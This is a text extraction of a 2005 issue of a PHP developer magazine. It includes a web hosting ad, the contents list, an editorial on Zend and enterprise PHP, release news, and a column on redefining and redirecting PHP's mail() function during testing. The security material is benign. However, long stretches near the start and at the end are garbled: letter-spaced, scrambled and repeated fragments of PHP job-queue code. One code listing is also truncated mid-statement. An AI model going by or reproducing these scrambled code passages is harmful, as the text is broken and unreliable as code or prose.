This content was uploaded by our users and we assume good faith they have the permission to share this book. If you own the copyright to this book and it is wrongfully on our website, we offer a simple DMCA procedure to remove your content from our site. Start by pressing the button below!
NEXCESS.NET Internet Solutions 304 1/2 S. State St. Ann Arbor, MI 48104-2445
http://nexcess.net
PHP / MySQL SPECIALISTS! Simple, Affordable, Reliable PHP / MySQL Web Hosting Solutions P O P U L A R S H A R E D H O S T I N G PAC K A G E S
MINI-ME
$
6 95
SMALL BIZ $ 2195/mo
/mo
500 MB Storage 15 GB Transfer 50 E-Mail Accounts 25 Subdomains 25 MySQL Databases PHP5 / MySQL 4.1.X SITEWORX control panel
2000 MB Storage 50 GB Transfer 200 E-Mail Accounts 75 Subdomains 75 MySQL Databases PHP5 / MySQL 4.1.X SITEWORX control panel
POPU L A R R E S E L L E R H O S TI N G PAC K A G E S NEXRESELL 1 $16 95/mo 900 MB Storage 30 GB Transfer Unlimited MySQL Databases Host 30 Domains PHP5 / MYSQL 4.1.X NODEWORX Reseller Access
NEXRESELL 2 $ 59 95/mo 7500 MB Storage 100 GB Transfer Unlimited MySQL Databases Host Unlimited Domains PHP5 / MySQL 4.1.X NODEWORX Reseller Access
: CONTROL
PA N E L
All of our servers run our in-house developed PHP/MySQL server control panel: INTERWORX-CP INTERWORX-CP features include: - Rigorous spam / virus filtering - Detailed website usage stats (including realtime metrics) - Superb file management; WYSIWYG HTML editor
INTERWORX-CP is also available for your dedicated server. Just visit http://interworx.info for more information and to place your order.
WHY NEXCESS.NET? WE ARE PHP/MYSQL DEVELOPERS LIKE YOU AND UNDERSTAND YOUR SUPPORT NEEDS!
NEW! PHP 5 & MYSQL 4.1.X
php 5
4.1.x
We'll install any PHP extension you need! Just ask :) PHP4 & MySQL 3.x/4.0.x options also available
php 4
3.x/4.0.x
128 BIT SSL CERTIFICATES AS LOW AS $39.95 / YEAR DOMAIN NAME REGISTRATION FROM $10.00 / YEAR GENEROUS AFFILIATE PROGRAM
UP TO 100% PAYBACK PER REFERRAL
30 DAY MONEY BACK GUARANTEE
FREE DOMAIN NAME WITH ANY ANNUAL SIGNUP
ORDER TODAY AND GET 10% OFF ANY WEB HOSTING PACKAGE VISIT HTTP://NEXCESS.NET/PHPARCH FOR DETAILS
D e di c a t e d & Ma n ag e d D edi c a t e d s e r v e r s o l ut i o ns a l s o a va i l a ble Serving the web since Y2K
m e _ l i m i t ( 3 6 0 0 ) ; t i t t o o n e h o u r n g ” f u n c i o n s e c t ( “ y o u r _ d b ” ) ; = “ S E L E C T * , a s i d j o b s j b , j o b _ u s j o b . o _ i d = i d t a t u s . j o b _ B Y j o b i d ” ; o u w a n t t e , t h e n c h a n g e b o l i s h t h e l m i t c r d = m y s q l _ y ) ) y o u v e t h i s c a n b e a n ( $ r o w = m y s q l _ e o r d s t ) ) k F u n c t i o n ( $ r o w ) ; h a v e n o t h i n g t o ) ; n ( $ f i e l d s ) i s i s w h e r e y o u r w h a t e v e r i t m a y t h c a e w e r e y t h a t d a t a o m p r o c s s i n g s e a n d g o i n t o d s t i n t i o n f i l e a k e a Columns w e ’ r e s a y i n g u s t Features l s t h n 1 0 0 l o n g n n c ( “ y o u r _ t i t t o “ 1 ” t o i s u n d e r w a y = “ U P D A T E j o b _ j o b _ s a t u s = 1 R E j o b _ i d = i d ’ ] ; r e u l = ( $ s q l ) ) ) “ p r e m w i t h j o b ” ) ; y = “ S E L E C T * l d s [ ‘ p r o c e s s n g _ r e c o r d s e t = ( $ q u e r y ) ) ( $ o w = _ a r r a y ) ) n m e s = “ ” ; v l u e s = “ ” ; c o m s t a t u e n ” ; _ n o t i c e = o r a c h ( $ r o w a s l u e ) { i f < 1 0 0 ) { $ n a m e s . = ; v l u e s . = $ v a l u e ) . ” ’ ” ; c o m a = “ , ” ; } e l s e { $ s t a t u s = l o w ” ; _ k y . ” w a s t o o } } s q l = “ I N S E R T d e s t i n a t i o n _ “ ( “ . $ n a m e s . ” ) v a u e s . ” ) ” ; f ( ! ( $ r e s u l t = ( $ q l ) ) ) { s t a t u s = ” ; _ n o i c e s f a i l e d ; “ ; } t a u s _ n o t i c e = [ ‘ i d ’ ] . ” : “ $ s t a t u s t ; r i t e _ o g _ d , $ s t a t u s _ t u ) ; $ s a u s + + ; / / g r e n o r $ r e d / i f $ p a s % 5 0 d a t e i m p o r t w i p e p s s + + ; f ( ( $ p a s s % 5 0 ) { $ q l = “ U P D A T E S E T S t a t u s _ G r e e n = n + “ . $ S t a t u s _ Y e l l o w = o w + “ . $ S t a t u s _ S t a t u s _ R d = + “ . $ S t a t u s _ p r o c e s e d = 5 0 W H E R E j o b _ i d = i d ’ ] ; i f ( ! ( $ r e u l t = ( $ s q l ) ) ) { d i e “ p r o b e m s p o r t j o b ” ) ; } S a t u s _ G r e e n = $ Y e l l o w R d = } s e t i t t o “ 2 ” t o h a s b e e n d o n e l = “ U P D A T E j o b _ o b _ t a t u s = 2 , t a t u s _ G r e e n = n + . $ S t a t u s _ Y e l l o w = w + “ . $ S t a t u s _ t a t u s _ R d = + “ . $ S t a t u s _ r o c e s e d = p s s ) 1 ) . ” H E R E j o b _ i d = i d ’ ] ; ! ( $ r e s u l t = ( $ q l ) ) ) e “ 1 2 3 } a t u s _ G r e e n 0 ; Y l o w = 0 ; R e d = 0 ; n w r i t _ l g _ d , $ s t a t u s _ t u s ) n e c ( “ y o u r = “ I N S E R T I N T O . = “ ( ` j o b ` , ` s t a t u s _ V A L U E S “ ; ‘ ” . $ j o b _ i d ) . ” ’ , ’ ” . s l a h e s ( $ s t a t u s ) s _ ” ; ! ( $ r e s u l t = ( $ s q l ) ) ) “ p o b l e m s w i t h l o g ” ) ; n D B _ _ n a m e ) s t = “ y o u r _ e r d b _ l o g i n ” ; s p a s s ” ; = m y s q l _ h o s t , $ d b u s e r , d i e 1 < ? h p m e _ l i m i t ( 3 6 0 0 ) ; t i t o o n e h o u r n g ” f u n c i o n s e c t ( “ y o u r _ d b ” ) ; = “ S E L E C T * , a s i d j o b s j b , j o b _ u s j o b . o _ i d = i d t a t u s . j o b _ B Y j o b i d ” ; o u w a n t t e , t h e n c h a n g e b o l i s h t h e l m i t c r d = m y s q l _ y ) ) y o u a v e h i s c n b e a n t o w = m y s q l _ ( $ r e o r d s t ) ) k F u n c t i o n ( $ r o w ) ; h a v e n o t h i n g t o ) ; n ( $ f i e l d s ) i s i s w h e r e y o u r w h a t e v e r i t m a y t h c a e w e r e y t h a t a t a o m a p r o c s s i n g s n d g o i n t o d e s t i n a t i o n f i l e a k e w e ’ r e s a y i n g u s t l s t h n 1 0 0 l o n g n n c ( “ y o u r _ t i t t o “ 1 ” t o i s u n d e r w a y = “ U P D A T E j o b _ j o b _ s a t u s = 1 R E j o b _ i d = i d ’ ] ; ( $ r e u l = s q l ) ) ) “ p r e m w i t h j o b ” ) ; y = “ S E L E C T * l d s [ ‘ p r o c e s s n g _ r e c o r d s e t = ( $ q u e r y ) ) ( $ o w = _ a r r a y ) ) n m e s = “ ” ; v l u e s = “ ” ; c o m s t a t u e n ” ; _ n o t i c e = o r e a c h ( $ r o w a s l u ) { i f < 1 0 0 ) { $ n a m e s . = ; v u e =,”; $e vl as le uo el )m .a ”s ’= ”. ;“ c } { TM
CONTENTS
14 PHP & Oracle
Analysis of this recently announced partnership and its benefits to the web developer community
6 EDITORIAL
by ROBERT MARK
21 Job Management with PHP & Cron
Discussion on building an admin page to create and monitor a job queue with near-real-time status updates by MIKE DeWOLFE
8 php|news
10 TIPS & TRICKS
mail() hacks
Redefining and Redirecting mail() by BEN RAMSEY
31 Flying with Seagull
A step-by-step guide for setting up an example module
by WILLIAM ZELLER and WERNER M. KRAUSS
45 User Management with Active Directory
Accessing, inserting or altering objects within the AD structure of Microsoft Windows Server 2003 by CHAD R. SMITH
52 TEST PATTERN
To Test is to Fake
How to properly test the whole system by MARKUS BAKER
57 SECURITY CORNER
Cross Site Scripting
by CHRIS SHIFLETT
SPECIAL FEATURE 60 Conference Coverage
Review and analysis of the php|works and web|works coference held in Toronto, September 14-16, 2005 by PETER B. MacINTYRE
64 exit(0);
It’s a Bird! It’s a Plane! It’s FUD!
by MARCO TABINI
Download this month’s code at: http://www.phparch.com/code/
WRITE FOR US!
If you want to bring a php-related topic to the attention of the professional php community, whether it is personal research, company software, or anything else, why not write an article for php|architect? If you would like to contribute, contact us and one of our editors will be happy to help you hone your idea and turn it into a beautiful article for our magazine. Visit www.phparch.com/writeforus.php or contact our editorial team at [email protected] and get started!
EDITORIAL
THE ENTERPRISE
T
AWAKENS
hose of us in the know have been aware of PHP’s readiness to take on the “enterprise” for quite a while, now. We’ve built serious applications, we’ve processed millions of dollars worth of transactions with our favorite language, and we’ve even been heard extolling PHP’s virtues before management-types. An all-too-common scene in the office, though, is PHP sneaking in through the back door. Upper- (or perhaps mid-) management has traditionally favored heavily-marketed, and “proven” products over non-orthodox, community-built technologies. I once worked for a CTO who (as the joke went, anyway) would build the next project on whatever platform was advertised on the last page of his business magazines. Unfortunately, many of the developers (myself included) were not convinced that the joke was only that—a joke. Despite—or perhaps thanks to—this lack of technological vision, our “little secret” language has been making huge inroads into the enterprise, lately. We have a few key players to thank for this; especially Zend. Zend’s involvement with PHP is obvious—they are “The PHP Company” after all. They’ve recently made a few strategic moves that are helping to propel PHP into the minds of corporations, IT managers, CTOs, and other business-types. As far as I’m concerned, they’ve made four key moves to promote PHP in this way. The first two are related (and the first of which is partially covered in this issue): Zend Core for Oracle, and Zend Core for IBM. Much like large-business’ dislike for non-mainstream software, they’re often seen shunning open-source database platforms. With Zend actively working with both Oracle and IBM’s DB2, the PHP database taboo has been lifted. Many corporations have already deployed systems on Oracle or DB2, and (correctly) see no need to add yet another database platform to their clusters. (IBM has returned the favor by participating in PHP development—see PDO_odbc (http://pecl.php.net/pdo_odbc), the PDO documentation (http://php.net/pdo) and SDO (http://pecl.php.net/sdo).) The next move on Zend’s part, of enterprise significance, is Marc Andreessen’s recent joining of Zend’s board of directors. Marc seems to have wholeheartedly accepted PHP as a legitimate platform for serious web applications, facing the competition of coffee-based languages head on: “PHP is to 2005 what Java was to 1995.” Those are strong words from a guy with both serious technology and business credibility. The last of Zend’s recent moves that I find significant is the recent announcement of the PHP Collaboration Project, including the Zend Framework. This one has three major enterprise-friendly parts (again, in my opinion): Engagement with the Eclipse Foundation, a standard development framework for PHP, and corporation-friendly licensing and license-auditing of the code in the framework. There is little information available on Zend’s work with Eclipse, but I’m eager to find out, as I’m personally an active PHP Eclipse user, and I long for certain features of Zend Studio (especially debugging). Just as with the database problem above, many companies already have Eclipse deployed for their (especially Java-) developers. The framework itself (to which I’ve been invited to participate, but as yet have only lurked on the mailing list) will hopefully breed a new generation of PHP applications that can avoid the menial task of form handling (as one example)—see also this month’s continuation of the article on building applications with the Seagull framework (which exists and is ready to use, today). The licensing feature of the framework is particularly beneficial to enterprises who wish to re-sell applications developed in PHP. The PHP project has been burned by the GPL before (which is why you won’t find any GPL-licensed extensions in PECL), and even for code licensed under a BSDish (e.g. PHP) license, there’s always the risk that code being stolen from an unknown source, without some sort of auditing. Zend provides this with their framework. All of this to say: not only is PHP ready for the enterprise, but the enterprise is starting to awaken to this fact. Kudos to the key players for making this happen!
Volume 4 - Issue 11 Publisher Marco Tabini Editor-in-Chief Sean Coates Editorial Team Arbi Arzoumani Peter MacIntyre Eddie Peloke Graphics & Layout Aleksandar Ilievski Managing Editor Emanuela Corso News Editor Leslie Hill [email protected] Authors Marcus Baker, Werner M. Krauß, Peter B. MacIntyre, Robert Mark, Ben Ramsey, Chris Shiflett, Chad R. Smith, Mike DeWolfe, William Zeller php|architect (ISSN 1709-7169) is published twelve times a year by Marco Tabini & Associates, Inc., P.O. Box 54526, 1771 Avenue Road, Toronto, ON M5M 4N5, Canada. Although all possible care has been placed in assuring the accuracy of the contents of this magazine, including all associated source code, listings and figures, the publisher assumes no responsibilities with regards of use of the information contained herein or in all associated material. php|architect, php|a, the php|architect logo, Marco Tabini & Associates, Inc. and the Mta Logo are trademarks of Marco Tabini & Associates, Inc.
php.net announces the release of PHP 4.4.1. “PHP 4.4.1 is now available for download. This version is a maintenance release, that contains numerous bug fixes, including a number of security fixes related to the overwriting of the GLOBALS array. All users of PHP 4.3 and 4.4 are encouraged to upgrade to this version. Some of the changes in PHP 4.4.1 include: • Added missing safe_mode checks for image* functions and cURL. • Added missing safe_mode/open_ basedir checks for file uploads. • Fixed a memory corruption bug regarding included files. • Fixed possible INI setting leak via virtual() in Apache 2 sapi. • Fixed possible crash and/or memory corruption in import_request_ variables(). • Fixed potential GLOBALS overwrite via import_request_variables(). • Fixed possible GLOBALS variable override when register_globals are ON. • Fixed possible register_globals toggle via parse_str(). Get your hands on the latest release at php.net!
phpBB 2.0.18
The phpBB Group is pleased to announce the release of phpBB 2.0.18, “The Halloween Special” release. This is a major update to the 2.0.x codebase and includes fixes for numerous bugs reported by users to our Bug Tracker, as well as updates to those issues identified by the recent security audit of the code and
a couple of security issues reported to us. In addition we have backported a further feature from our “Olympus” codebase to change the way automatic logins are handled. We would like to thank all of those who took part in the security audit of the code for their work. As with all new releases we urge you to update as soon as possible. You can, of course, find this download available on our downloads page. As per usual, four packages are available to simplify your update. For more information visit: http://www.phpbb.com/
FUDforum 2.7.3 Released
Ilia.ws announces: After nearly 2 months of testing and development, I am happy to announce the release of FUDforum 2.7.3, the new stable version. This is primarily a bug-fix release and all users, especially those of the 2.7 series are encouraged to upgrade to it. As far as the changes go, this version is virtually identical to the prior release candidate. The one major addition was the integration of the Indonesian translation that now makes the forum available in a whooping 26 languages, 2 more than in the prior stable release. Get all the latest info from ilia.ws.
symfony 0.4.1
symfony-project.com announces the release of version 0.4.1. What is symfony? The site describes it as professional web tools for lazy folks: Based on the best practices of web development, thoroughly tried on several active websites, symfony aims to speed up the creation and maintenance of web applications, and to replace the repetitive
coding tasks by power, control and pleasure If you have been looking for a Rails/ Django-like framework for PHP projects with features such as: • simple templating and helpers • cache management • multiple environments support • deployment management • scaffolding • smart URLs • multilingual and I18N support • object model and MVC separation • Ajax support ...where all elements work seamlessly together, then symfony is made for you. Check out the latest version of symfony at symfony-project.com.
PHP Québec 2006: call for speakers
PHP Québec is pleased to announce the 2006 PHP Québec conference, which will be held between March 29th and 31st, 2006. We are looking for the best speakers, willing to share their experience and skills with professional PHP developers from eastern Canada and USA. PHP Québec 2006 features 3 distinct tracks: • Technical PHP, covering in deep details of PHP techniques. • Professional Development, featuring tools and development methodologies to increase productivity. • Databases, covers different databases that can be used with PHP. Sessions will be held in French or English. For more information, see the PHP Québec website: conf.phpquebec.com/en/conf2006/
php|architect Releases New Design Patterns Book We’re proud to announce the release of php|architect’s Guide to PHP Design Patterns, the latest release in our Nanobook series. You have probably heard a lot about Design Patterns —a technique that helps you design rock-solid solutions to practical problems that programmers everywhere encounter in their day-to-day work. Even though there has been a lot of buzz, however, no-one has yet come up with a comprehensive resource on design patterns for PHP developers—until today. Author Jason E. Sweat’s book php|architect’s Guide to PHP Design Patterns is the first, comprehensive guide to design patterns designed specifically for the PHP developer. This book includes coverage of 16 design patterns with a specific eye to their applications in PHP when building complex web applications, both in PHP 4 and PHP 5 (where appropriate, sample code for both versions of the language is provided). For more information, http://www.phparch.com/shop_product.php?itemid=96.
Volume 4 Issue 11 • php|architect •8
Check out some of the hottest new releases from PEAR.
ScriptReorganizer 0.3.0
Library/Tool focusing exclusively on the file size aspect of PHP script optimization.
HTTP_Request 1.3.0
Provides an easy way to perform HTTP requests
Calendar 0.5.3
Calendar provides an API for building Calendar data structures. Using the simple iterator and it’s “query” API, a user interface can easily be built on top of the calendar data structure, at the same time easily connecting it to some kind of underlying data store, where “event” information is being held. It provides different calculation “engines” the default being based on Unix timestamps (offering fastest performance)
Looking for a new PHP Extension? Check out some of the latest offerings from PECL.
expect 0.1
pecl_http 0.17.0 - Extended HTTP Support - Building absolute URLs - RFC compliant HTTP redirects - RFC compliant HTTP date handling - Parsing of HTTP headers and messages - Caching by “Last-Modified” and/ or ETag (with ‘on the fly’ option for ETag generation from buffered output) - Sending data/files/streams with (multiple) ranges support
with an alternative using PEAR::Date which extends the calendar past the limitations of Unix timestamps. Other engines can be implemented for other types of calendars (e.g. a Chinese Calendar based on lunar cycles).
Benchmark 1.2.4
Framework to benchmark PHP scripts or function calls.
Text_Wiki_BBCode 0.0.2
HTML_Template_Sigma 1.1.4
HTML_Template_Sigma implements Integrated Templates API designed by Ulf Wendel.
PEAR_ PackageFileManager 1.6.0a4
PEAR_PackageFileManager takes an existing package.xml file and updates it with a new filelist and changelog
Parses BBCode mark-up to tokenize the text for Text_Wiki rendering (Xhtml, plain, Latex) or for conversions using the existing renderers (wiki).
PEAR 1.4.4
Text_Wiki 1.0.2
PEAR_RemoteInstaller 0.2.0
Abstracts parsing and rendering rules for any markup as Wiki or BBCode in structured plain text.
- Negotiating user preferred language/ charset - Convenient request functionality built upon libcurl - PHP5 classes: HttpUtil, HttpResponse (PHP-5.1), HttpRequest, HttpRequestPool, HttpMessage
PDO_SQLITE 1.0RC2
This extension provides an SQLite v3 driver for PDO. SQLite V3 is NOT compatible with the bundled SQLite 2 in PHP 5, but is a significant step forward, featuring complete utf-8 support, native support for blobs, native support for prepared statements with bound parameters and improved concurrency.
PEAR Base System
PEAR Remote installation plugin through FTP
PDO_PGSQL 1.0RC2
This extension provides a PostgreSQL driver for PDO.
PDO_ODBC 1.0RC2
This extension provides an ODBC v3 driver for PDO. It supports unixODBC and IBM DB2 libraries, and will support more in future releases.
PDO_OCI 1.0RC2
This extension provides an Oracle driver for PDO.
Volume 4 Issue 11 • php|architect •9
mail() Hacks
TIPS & TRICKS
mail() Hacks How do you send e-mail on a server in which there is no mail server installed? How do you redirect e-mail messages in a testing environment so they don’t go to your users? This edition of Tips & Tricks addresses these two questions, highlighting some useful tricks to redefine or redirect mail().
by BEN RA MSEY
P
HP provides an awesome built-in feature with the mail() function. I refer to it as “awesome” because I originally came to this language from the background of ASP and VBScript, and to successfully send an e-mail message from an ASP script, one had to purchase a third-party COM object and successfully install and register the object on a Windows server. PHP has mail capabilities built right into the language, providing developers with a powerful and easy way to send e-mail. Sometimes, however, whether for purposes of security (in which the server doesn’t have access to a local mail server) or debugging (mail should be trapped and not sent to users), it becomes necessary to redefine the mail() function, or redirect it. In this edition of Tips & Tricks, we’ll explore how to do both.
Redefining mail() There might be times in which server administrators do not wish to provide access to mail functionality. For example, they are unwilling to install sendmail,
CODE DIRECTORY: hacks TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/262 postfix, or any other mail servers. There are valid security reasons for disallowing mail servers, such as the fear of a Web server being used as a spam relay, but this lack of functionality can put a damper on Web application features. Furthermore, while applications can be written in such a way as to get around this limitation (e.g. using sockets and SMTP), there are many thirdparty applications and tools that rely on PHP’s mail() function, and it is far too time consuming to rework these applications to use your own mail function. Thus, for full compatibility, it becomes necessary to hack away at PHP’s mail() command and create your own, but, as difficult as this sounds, it’s actually quite simple to do. To completely redefine the mail() function, it is necessary to recompile PHP without support for the function. Afterwards, we’ll create a new mail() function Volume 4 Issue 11 • php|architect • 10
mail() Hacks using PHP, and your applications will be none the wiser. First, to compile PHP without mail(), run the c command as normal, including all desired parameters. Then, before running make, edit main/php_config.h. Find the line that reads: #define HAVE_SENDMAIL 1
Comment out this line, so that it now reads: /* #define HAVE_SENDMAIL 1 */
php_value auto_prepend_file /path/to/new_mail.php
Now, we have a mail() function that will perform similarly to the built-in function, and all PHP applications on the system have access to use it. Keep in mind that other PHP mailing libraries could be used; you are not limited to PEAR::Mail.
Redirecting mail()
Now, run make and make install as usual. This will essentially disable the mail() function, and it will no longer be available to your scripts. So, our next step is to create a mail() function at the application level. Listing 1 shows one such example mail() function using the PEAR::Mail package. This function implements the same exact parameters as the native PHP mail() function to ensure compatibility with any applications that require the use of mail(); it does not use the $additional_parameters
.htaccess file:
At times it is preferable to turn off mail functionality altogether without recompiling PHP. This includes applications that are running on testing servers and need to use mail() for debugging purposes, but should not send any actual mail messages—or should send messages but only to the developers. In cases such as these, it is possible to redirect mail messages sent through mail() by modifying the php.ini sendmail_path value. Modifying sendmail_path is a simple task. The complexities lie in the script to which all mail is redirected. This script may be as simple as directing all mail to a log file or redirecting it to the project developers, or it may be as complex as implementing a fullscale mail solution using a PHP command-line interface (CLI) script to both send mail, as illustrated in Listing 1, and log everything. We’ll examine all of these options. If the goal is to temporarily turn off mail and redirect it to a log file, simply create a script named logmail, set the permissions level to 755 (chmod 755 logmail), and put the following line in the script:
When testing, mail() shouldn’t go to real users.
parameter since that is primarily used to pass additional arguments to the sendmail (or other mailer) binary. This new function should also behave in exactly the same way as the native function and all parameters passed to it should follow the rules for mail() as defined in the PHP manual. NOTE: Using this method, you cannot simply create a new mail() function using the PEAR::Mail “mail” driver, as this driver also utilizes PHP’s built-in mail() function to send mail. Thus, redefining the mail() function to use the PEAR::Mail “smtp” driver should also work for any applications that use PEAR::Mail with the mail driver. Using PEAR::Mail with the sendmail driver will not work if sendmail is not available on the system. Now that we have defined a new mail() function, we need to make it accessible to the applications that require it. The quickest and easiest way to do this is to use the auto_prepend_file setting in php.ini: auto_prepend_file = /path/to/new_mail.php
You may also set this in your Apache httpd.conf or
cat >> /tmp/logmail.log
Then, set sendmail_path in php.ini to /path/to/logmail. Don’t forget to restart your web server. Now, all e-mail sent by applications will be stored in /tmp/logmail.log rather than reaching the recipient in the To header. NOTE: The sendmail_path directive may be set only in php.ini or Apache’s httpd.conf. It cannot be set from an .htaccess file. There may be times, however, when properly testing an application means that all e-mail messages generated by the application must be sent somewhere, but they Volume 4 Issue 11 • php|architect • 11
mail() Hacks shouldn’t go to any real users. Thus, we need to trap the mail, which is another fairly simple task. Create a script named trapmail, set the permissions level, again, to 755, and place the following in the script (replacing [email protected] with your choice of email address, of course): formail -R cc X-original-cc \ -R to X-original-to \ -R bcc X-original-bcc \ -f -A”To: [email protected]” \ | /usr/sbin/sendmail -t –i
Then, as with earlier, set the sendmail_path directive to /path/to/trapmail. This will successfully redirect all e-mail messages sent by the application to [email protected], and the original To, Cc, and Bcc headers will be rewritten to X-original-to, X-original-cc, and X-original-bcc respectively. To do this, sendmail must be available on the system, yet it is not required, since it is possible to create a PHP CLI script to combine this sort of redirecting with code from the custom mail() script of Listing 1 to redirect and log any messages sent by a PHP application. Listing 2 gives a glimpse into how this is possible. I would save the code in Listing 2 to a file such as /usr/local/bin/php_mailer and set its permissions to 755. Then, I would implement some form of logging, perhaps using PHP 5’s file_put_contents(), along with a mailer package to send mail to either the intended recipient (on a production server) or the developers (on a testing server). Also, notice that the mail is received on standard input in Listing 2. The message is being received in exactly the same format that sendmail would receive it. Thus, this script must parse the received message, extract the headers and body (we have already done this), and send them to PEAR::Mail in the format it expects. Finally, the sendmail_path directive must be set to /usr/local/bin/php_mailer to make use of it. These suggestions are simple, yet effective, ways to either send e-mail when your server can’t support PHP’s native mail() function or you wish to redirect messages during development or testing. I hope you can see how these methods are versatile and can be extended to implement some rather complex mailing functionality. I’d like to thank Sean Coates and Davey Shafik, who allowed me the use of content from their blogs to make this column possible. If you have tip and/or trick that you’d like to see published here, send it to [email protected], and, if I use it, you’ll receive a free digital subscription to php|architect. Until next time, happy coding!
‘mail.example.org’, ‘port’ => 25, ‘auth’ => TRUE, ‘username’ => ‘smtp_username’, ‘password’ => ‘smtp_password’, ‘persist’ => FALSE ); /* Parse headers */ $headers = array(); if (!is_null($additional_headers) && is_string($additional_headers)) { $tmp_headers=explode(“\r\n”,$additional_headers); foreach ($tmp_headers as $header) { list($h, $v) = explode(‘:’, $header); $headers[$h] = trim($v); } } /* Set default headers, if not present */ $headers[‘Subject’] = $subject; if (!isset($headers[‘To’])) $headers[‘To’] = $to; if (!isset($headers[‘Date’])) $headers[‘Date’] = date(‘r’); if (!isset($headers[‘From’])) $headers[‘From’] = $from; /* Send the mail message */ $mail_object =& Mail::factory(‘smtp’, $smtp_params); $e = $mail_object->send($to, $headers, $message); if (PEAR::isError($e)) { exit($e->getMessage()); } } ?>
LISTING 2 1 2 3 4 5 6 7 8 9 10 11 12 13
#!/usr/local/bin/php
BEN RAMSEY is a Technology Manager for Hands On Network in Atlanta, Georgia. He is an author, Principal member of the PHP Security Consortium, and Zend Certified Engineer. Ben lives just north of Atlanta with his wife Liz and dog Ashley. You may contact him at [email protected] or read his blog at http://benramsey.com/. Volume 4 Issue 11 • php|architect • 12
Tips & Tricks
t _ t i m e _ 6 0 0 ) ; l i m t i t p t r o o c o n s e s i n g “ M a n ” f e u r e c t i o n s C o n n e c t ( “ y u r _ y = “ S b E _ L i E d C T a s * R , i O d M j o b s s t j a o t b u , s j H o E b R _ E j o b j . o b _ i _ d i d A = N D t a = t u 0 s . j o b _ D E R B Y I j T o b 1 ” ; i f i d y o u w a m n o t r e t , t o h r e n a b c o h l a i n s g h e t h e ( $ e c r d u e r ( = $ q u e r y ) ) / i f y o f 1 a v t e h i a s e m c e n n b e h i a l n ( $ r o t w c h = _ a r d a s y t ) ) { W o r k F u n c t i o n ( $ r o } w ) e / W e h a v e s s n o t h i x n i g t ( ) ; c t i o n ( $ f i e l d s ) / h i s i r s k w g h o e e r s e , b e w h a t e v e r n t h i n g c t o s m a y s t h a t f r m a f i l e i d n a t o a b a / s e a d e s t i n i o n t o a k i e o , w e ’ e r l e d s s m y u i n t g b e l s s r s t h l a o n n g 1 0 0 B _ C n n c ( “ y o u r _ / t i t j t o o b “ i 1 s ” s u q t n l o d e = r w “ a U S y P E D T A T j E o b j _ o s W b H _ a E t R u E s j d = o s b [ 1 _ ‘ i i d d ’ = ] f ; ( ! ( $ r e u e u r l y = q l { ) ) ) d i e “ p r e m e p m o t } j o b ” ) ; q u e r y = “ S E L E C T d s * [ ‘ r o c e s s i n g _ f ( $ r e c o u r e d r y e ( t $ q = u { r y ) ) P w h A i l R TNERSHIP ( e $ t c o h w _ a = r r d a s y e t ) ) { $ n m e s = v “ ” l ; u e s = c o “ ” m ; s t a t _ u G r e e n ” ; _ n o t i c e f o r e a c = h > ( $ $ v r o l w e ) { i f ( $ v a l u ) < 1 0 0 ) { $ $ n k a e m y e ; s . = ” v ’ ” l . u e s h . e = s ( $ v a l u e ) . ” ’ ” ; c o m a = } e l s e { $ _ s Y t e a l t l u o s w ” = ; . = $ k y _ . ; ” w a s t o o } } s q l = “ I N S E d R s T [ ‘ d e s t i n a t i o n _ “ e . ” ) V A u L e U s E . S ” ) ” ; i f ( ! ( $ r r y e ( s $ u l q t l ) = ) ) { s t _ a R t e u d s ; = . = “ _ p r o c “ e ; s } $ s t a “ u . s $ _ r n o o w t [ i ‘ c i e d ’ ] . $ ” s t : a t “ u s w r i t e o _ b l _ o i g d _ , $ s $ t s a t t a u t s u _ ) ; $ $ s a a t u u s s + + = ; $ g o r r e e n y e l l o w / / i f 0 $ p h a n s u t p a d b a l t e e a n d w i i c e s $ p a s s + + ; i f ( ( $ ) p s s % { $ q l j o = b _ s t a t u S S E T s _ G s r _ e G e r n e e + / n / “ . s t i h t e t j o o b “ n 2 h e ” a $ s q l = “ u U P D S A E T T E j o b _ s t t u s = S t a t u s s _ _ G G r r e e e e n n u + s _ G r e n . ” I , = S t a t u a _ t Y u e s l _ l Y o w l l o w . ” , R e d R e + d = R e d . ” , p r o c e s l s ( $ d p a = s s ) W H E R E e j o s b [ _ ‘ i i d d ’ i ] f ; ( ! _ r q e u s e u l y t ( $ q l { ) ) ) d i e “ 1 2 3 $ S } t a t u s _ G r e e n = Y e l l o w = } R d = 0 ; c t i o n w r o i b t _ i _ d , $ g s $ _ t s a t t a u t s u _ s ) B _ C n e c ( “ y o u r s q l = “ I N “ S ; E R T I N T O . = “ a ( t ` u j s o ` b , _ ` s ) t ” a t u s V A L U E S h e “ ‘ s ; ” ( . $ j o b ’ _ . a d d s l a . h e s ( $ s t a t u s s ) . ” ’ ) ” ; f ( ! ( $ r u e e s r u y l ( t $ s = q l { ) ) ) d e “ p e o b i l m e p m o s r t } l o g ” ) ; c t o n D B ( _ $ d b _ n a m e ) d b h s t = ; “ y o u r _ u s e r d b _ p a s c = m y ( s $ q d l b _ h o s t ) , $ d b u s e | r | , d i e 1 < ? p h t p _ t i m e _ 6 0 0 ) ; l i m t i p t r o o c o n s e s i n g “ M a n ” f e u r e c t i o n s C o n n e c t ( “ y u r _ y = “ S b E _ L i E d C T a s * R , i O d M j o b s s t j a o t b u , s j H o E b R _ E j o b j . o b _ i _ d i d A = N D t a = t u 0 s . j o b _ D E R B Y I j T o b 1 ” ; i f i d y o u w a m n o t r e t , t o h r e n a b c o h l a i n s g h e t h e ( $ r e c r d u e ( = $ q u e r y ) ) / i f y o f 1 v e h i a s e m c e a n n t b e h i a l n ( $ o t w c h = _ a r r d a s y t ) ) { W o r k F u n c t i o n ( $ r o } w ) e / W e h a v e s s n o t h i x n i g t ( ) ; o n c t i ( $ f i e l d s ) / h i s i r s k w g h o e e r s e , b e w h a t e v e r n t h i n g c t o s m a y s t h a t f r m a f i l e i d n a t o a b a / s e a d e s t i n i o n t o a k i e o , w e ’ e r l e d s s m y u i s n t g b e l s r s t h l a o n n g 1 0 0 B _ C n n c ( “ y o u r _ / t i t j t o o b “ i 1 s ” s u q t n l o d e = r w “ a U S y P E D T A T j E o b j _ o s W b H _ a E t R u E s j d = o s b [ 1 _ ‘ i i d d ’ = ] f ; ( ! r e u e u r l y ( $ = q l { ) ) ) d e “ p r e i m e p m o t } j o b ” ) ; q u e r y = “ S E L E C T d s * [ ‘ r o c e s s i n g _ f ( $ r e c o u r e d r y e ( t $ q = u { r y ) ) w h i l ( e $ t c o h w _ a = r r d a s y e t ) ) { n m e s = $ v “ ” l ; u e s = c o “ ” m ; s t a t _ u G r e e n ” ; _ n o t i c e f o r e a 